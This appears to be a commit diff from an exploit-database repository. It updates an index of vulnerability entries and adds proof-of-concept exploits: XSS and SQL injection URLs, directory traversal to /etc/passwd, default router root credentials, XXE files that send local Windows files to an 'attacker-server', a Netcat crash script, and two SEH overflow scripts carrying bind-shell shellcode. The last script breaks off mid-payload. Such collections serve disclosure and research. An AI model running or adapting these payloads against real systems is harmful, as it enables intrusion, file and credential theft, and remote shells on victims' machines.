29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0
29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0
29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0
29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0
29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0
@ -30945,8 +30951,8 @@ id,file,description,date,author,platform,type,port
30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - showuser who Parameter Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps,0
30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR - TakeProfEdit.php HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0
30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0
30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0
30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0
30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0
30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0
30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0
30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0
30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0
@ -31140,8 +31146,8 @@ id,file,description,date,author,platform,type,port
30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0
30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0
30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0
30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0
30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0
30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0
@ -34657,13 +34663,13 @@ id,file,description,date,author,platform,type,port
36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0
36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
40870,platforms/php/webapps/40870.txt,"Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0
36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0
36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0

Can't render this file because it is too large.

0
platforms/php/webapps/5775.txt → platforms/asp/webapps/5775.txt
View file

2
platforms/hardware/remote/16275.txt
View file

@ -188,7 +188,7 @@ Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)
1 root S 280 0 0.0 1.9 init
# echo * ## ls o.O?!?
bin dev etc lib linuxrc mnt proc sbin usr var webs
# &lt;/textarea&gt;
# </textarea>
</li>
<li id="text-cont_2">
<label for="extension">Text file extension:</label>

30
platforms/hardware/remote/40867.txt Executable file
View file

@ -0,0 +1,30 @@
######################
# Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities
# Version: Gan9.8U6X-B-TW-R1B020_1T1RP
# Exploit Author : Persian Hack Team
# Tested on [ Win ]
# Date 2016/12/05
######################
1. Cross Site Scripting
PoC : First We Need To login To Panel And page Parameter Vulnerable to Cross Site Scripting
http://192.168.1.1/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E
2. Default Telnet Root Password.txt
PoC : Username:root Password:root
telnet 192.168.1.1
(none) login: root
Password:root
~ $ cat /proc/version
Linux version 2.6.19 (dsl@crlinux) (gcc version 3.4.6-1.3.6) #3 Fri May 18 13:09:57 CST 2012
3. Directory Traversal.txt
PoC : First We Need To login To Panel And getpage Parameter Vulnerable to Local File Disclosure
http://192.168.1.1/cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page=

2
platforms/hardware/webapps/25968.pl
View file

@ -33,7 +33,7 @@ while(1){
if($file eq ""){ print "Enter full path to file!\n"; }
$data=get($bug) || die "$!, try another exploit\n";
$data =~ s/Null/File not found!/gs;
if (defined $data =~ m{rows="30">(.*?)&lt;/textarea&gt;}sx){
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
print $1."\n";
}}
sub usg

78
platforms/linux/dos/40866.py Executable file
View file

@ -0,0 +1,78 @@
#/usr/bin/python
#-*- Coding: utf-8 -*-
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###
# Date: 2016-11-19
# Exploit Author: n30m1nd
# Vendor Homepage: http://netcat.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
# Version: 0.7.1
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux
# Credits
# =======
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!
# How to
# ======
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:
# * # Download
# * tar -xzf netcat-0.7.1.tar.gz
# * cd netcat-0.7.1/
# * ./configure
# * make
# * # Netcat will be deployed in src/netcat
#
# * Set netcat to listen like the following:
# * ./netcat -nlvp 12347 -T
# * Just run this script on a different terminal
#
# Why?
# ====
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes
# by running them through buggy switch/case code.
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.
# Vulnerable code
# ===============
# telnet.c
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
# 88 /* loop all chars of the string */
# 89 for (i = 0; i < ref_size; i++) {
# 90 /* if we found IAC char OR we are fetching a IAC code string process it */
# 91 if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#100 getrq[l++] = buf[i]; // BANG!
# 99 /* copy the char in the IAC-code-building buffer */
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# Exploit code
# ============
import socket
RHOST = "127.0.0.1"
RPORT = 12347
print("[+] Connecting to %s:%d") % (RHOST, RPORT)
s = socket.create_connection((RHOST, RPORT))
s.send("\xFF") # Telnet control character
print("[+] Telnet control character sent")
print("[i] Starting")
try:
i = 0
while True: # Loop until it crashes
i += 1
s.send("\x30")
except:
print("[+] GNU Netcat crashed on iteration: %d") % (i)

7
platforms/php/webapps/27152.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/16435/info
BrowserCRM is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E

9
platforms/php/webapps/36452.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
http://www.example.com/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

29
platforms/php/webapps/40870.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Single Personal Message 1.0.3 Plugin WordPress Sql Injection
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/
# Software Link: https://wordpress.org/plugins/simple-personal-message/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.3
# Tested on: Windows 8
1 - Description:
$_GET['message'] is not escaped. Is accessible for every registered user.
http://lenonleite.com.br/en/blog/2016/12/05/single-personal-message-1-0-3-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 - Login as regular user (created using wp-login.php?action=register):
2 - Access url:
http://target/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=0%20UNION%20SELECT%201,2.3,name,5,slug,7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1
3 - Timeline:
28/11/2016 - Discovered
28/11/2016 - vendor notified

126
platforms/windows/local/40863.txt Executable file
View file

@ -0,0 +1,126 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
========================
Microsoft Event Viewer
Version: 1.0
The Windows Event Viewer shows a log of application and system messages
errors, information messages, and warnings.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Windows Event Viewer user can import 'Custom View' files, these files
contain XML, the parser processes External Entity potentially allowing
attackers
to gain remote file access to files on a victims system if user imports a
corrupt XML file via remote share/USB (or other untrusted source).
Tested Windows 7 SP1
Exploit code(s):
===============
1) Go to Windows CL type 'eventvwr' to bring up Windows Event Viewer.
2) Action / Import Custom View
3) Import the malicious 'MyCustomView.xml' via remote share or USB for POC
4) Files are accessed and sent to remote server.
User gets error like "The specified custom view is not valid" attacker gets
files!
"payload.dtd" (host on attacker server)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
%all;
"MyCustomView.xml" (malicious windows Event Custom View XML)
<?xml version="1.0"?>
<!DOCTYPE APPARITION [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Attacker server listener
python -m SimpleHTTPServer 8080
Disclosure Timeline:
=====================================
Vendor Notification: August 30, 2016
Vendor reply: "does not meet the bar for security servicing." August 30,
2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

132
platforms/windows/local/40864.txt Executable file
View file

@ -0,0 +1,132 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
==========================
Windows System Information
MSINFO32.exe v6.1.7601
Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system
components, and software environment.
Parameters
FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack
which can potentially allow remote attackers to
gain access to and exfiltrate files from the victims computer if they open
a malicious ".nfo" file via remote share / USB etc.
Upon open the file user will see error message like "System Information is
unable to open this .nfo file. The file might
be corrupt etc..
Tested Windows 7 SP1
Exploit code(s):
===============
Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.
1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)
2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
%all;
3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32
opens... attacker gets files.
OR open via Windows CL:
c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo
Disclosure Timeline:
======================================
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

114
platforms/windows/local/40865.txt Executable file
View file

@ -0,0 +1,114 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE-COUCHDB-LOCAL-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
==================
couchdb.apache.org
Product:
==============
CouchDB v2.0.0
Apache CouchDB is open source database software that focuses on ease of use
and having an architecture. It has a document-oriented
NoSQL database architecture and is implemented in the concurrency-oriented
language Erlang; it uses JSON to store data, JavaScript
as its query language using MapReduce, and HTTP for an API.
Vulnerability Type:
===================
Privilege Escalation (Insecure File Permissions)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CouchDB sets weak file permissions potentially allowing 'Standard' Windows
users to elevate privileges. The "nssm.exe" (Apache CouchDB)
executable can be replaced by a 'Standard' non administrator user, allowing
them to add a backdoor Administrator account once the
"Apache CouchDB" service is restarted or system rebooted.
As Apache CouchDB runs as LOCALSYSTEM, standard users can now execute
arbitrary code with the privileges of the SYSTEM.
Issue is the 'C' flag (Change) for 'Authenticated Users' group.
e.g.
c:\CouchDB>cacls * | findstr Users
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
c:\CouchDB>sc qc "Apache CouchDB"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Apache CouchDB
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\CouchDB\bin\nssm.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Apache CouchDB
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

78
platforms/windows/remote/40868.py Executable file
View file

@ -0,0 +1,78 @@
#!/usr/bin/python
#Open the DupScout client and click on Tools > click on Connect Network Drive > type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server (port 9126)
#SEH based stack overflow in DupScout server
#Tested in Windows 7 Professional
#For educational proposes only
#msfvenom -a x86 --platform windows -p windows/shell/bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=EAX -f python
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x49\x6c\x49\x78\x6f\x72\x47\x70\x57\x70\x45\x50\x43"
buf += "\x50\x4e\x69\x49\x75\x30\x31\x59\x50\x31\x74\x4e\x6b"
buf += "\x30\x50\x34\x70\x4e\x6b\x53\x62\x66\x6c\x4c\x4b\x36"
buf += "\x32\x45\x44\x4e\x6b\x52\x52\x44\x68\x34\x4f\x6d\x67"
buf += "\x71\x5a\x51\x36\x76\x51\x49\x6f\x6c\x6c\x57\x4c\x70"
buf += "\x61\x61\x6c\x53\x32\x34\x6c\x61\x30\x4b\x71\x38\x4f"
buf += "\x44\x4d\x43\x31\x78\x47\x4b\x52\x4c\x32\x72\x72\x42"
buf += "\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x72\x6a\x45\x6c"
buf += "\x4e\x6b\x62\x6c\x32\x31\x51\x68\x4d\x33\x71\x58\x36"
buf += "\x61\x78\x51\x72\x71\x4c\x4b\x30\x59\x65\x70\x66\x61"
buf += "\x4a\x73\x6c\x4b\x73\x79\x72\x38\x7a\x43\x64\x7a\x43"
buf += "\x79\x6c\x4b\x46\x54\x6c\x4b\x36\x61\x6a\x76\x75\x61"
buf += "\x49\x6f\x4e\x4c\x5a\x61\x48\x4f\x34\x4d\x55\x51\x4b"
buf += "\x77\x74\x78\x6b\x50\x74\x35\x6b\x46\x35\x53\x73\x4d"
buf += "\x68\x78\x77\x4b\x43\x4d\x31\x34\x62\x55\x4b\x54\x33"
buf += "\x68\x4e\x6b\x73\x68\x64\x64\x66\x61\x58\x53\x73\x56"
buf += "\x6e\x6b\x74\x4c\x50\x4b\x6e\x6b\x73\x68\x75\x4c\x57"
buf += "\x71\x38\x53\x4c\x4b\x44\x44\x6e\x6b\x77\x71\x4e\x30"
buf += "\x6b\x39\x77\x34\x65\x74\x37\x54\x51\x4b\x53\x6b\x30"
buf += "\x61\x46\x39\x43\x6a\x42\x71\x69\x6f\x79\x70\x53\x6f"
buf += "\x53\x6f\x43\x6a\x6e\x6b\x66\x72\x7a\x4b\x4e\x6d\x71"
buf += "\x4d\x71\x78\x74\x73\x70\x32\x65\x50\x75\x50\x75\x38"
buf += "\x34\x37\x54\x33\x56\x52\x71\x4f\x56\x34\x63\x58\x30"
buf += "\x4c\x74\x37\x46\x46\x56\x67\x49\x6f\x4b\x65\x58\x38"
buf += "\x4c\x50\x35\x51\x73\x30\x65\x50\x55\x79\x4b\x74\x71"
buf += "\x44\x30\x50\x71\x78\x51\x39\x4b\x30\x32\x4b\x55\x50"
buf += "\x6b\x4f\x4b\x65\x62\x4a\x66\x6b\x51\x49\x56\x30\x69"
buf += "\x72\x69\x6d\x51\x7a\x65\x51\x32\x4a\x37\x72\x73\x58"
buf += "\x6b\x5a\x76\x6f\x4b\x6f\x4b\x50\x6b\x4f\x59\x45\x5a"
buf += "\x37\x73\x58\x76\x62\x53\x30\x77\x61\x43\x6c\x6b\x39"
buf += "\x48\x66\x43\x5a\x42\x30\x62\x76\x43\x67\x30\x68\x5a"
buf += "\x62\x79\x4b\x54\x77\x53\x57\x6b\x4f\x79\x45\x4f\x75"
buf += "\x6f\x30\x51\x65\x36\x38\x66\x37\x42\x48\x58\x37\x4d"
buf += "\x39\x45\x68\x49\x6f\x49\x6f\x6b\x65\x32\x77\x70\x68"
buf += "\x52\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x38\x55\x30"
buf += "\x57\x6a\x37\x52\x48\x44\x35\x50\x6e\x70\x4d\x73\x51"
buf += "\x49\x6f\x4e\x35\x62\x4a\x65\x50\x50\x6a\x54\x44\x30"
buf += "\x56\x66\x37\x31\x78\x46\x62\x4a\x79\x78\x48\x71\x4f"
buf += "\x69\x6f\x5a\x75\x4f\x73\x6b\x48\x35\x50\x53\x4e\x66"
buf += "\x4d\x4e\x6b\x45\x66\x73\x5a\x37\x30\x52\x48\x35\x50"
buf += "\x76\x70\x75\x50\x53\x30\x43\x66\x50\x6a\x43\x30\x30"
buf += "\x68\x62\x78\x49\x34\x32\x73\x7a\x45\x4b\x4f\x68\x55"
buf += "\x4d\x43\x56\x33\x70\x6a\x55\x50\x46\x36\x62\x73\x53"
buf += "\x67\x32\x48\x35\x52\x6b\x69\x78\x48\x51\x4f\x79\x6f"
buf += "\x79\x45\x6d\x53\x69\x68\x37\x70\x53\x4e\x67\x77\x46"
buf += "\x61\x39\x53\x55\x79\x6b\x76\x34\x35\x7a\x49\x6f\x33"
buf += "\x41\x41"
nseh = "\x54\x58\x41\x41"
seh = "\x4f\x40\x12\x10"
align = "\x05\x34\x28\x25\x41" #add eax,0x41252843
align += "\x2d\x7e\43\x25\x41" #sub eax,0x4125437e
align += "\x50" #push eax
align += "\xc3" #ret
offset = 1584
buffer = "\x41"*175 + buf
buffer += "\x42"*(offset-175-len(buf))
buffer += nseh + seh
buffer += align + "\x44"*(1000-len(align))
file = open('boom.txt','w')
file.write(buffer)
file.close()

67
platforms/windows/remote/40869.py Executable file
View file

@ -0,0 +1,67 @@
#!/usr/bin/python
import socket,os,time
#SEH Stack Overflow in GET request
#DiskBoss Enterprise 7.4.28
#Tested on Windows XP SP3 & Windows 7 Professional
#For educational proposes only
host = "192.168.1.20"
port = 80
#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
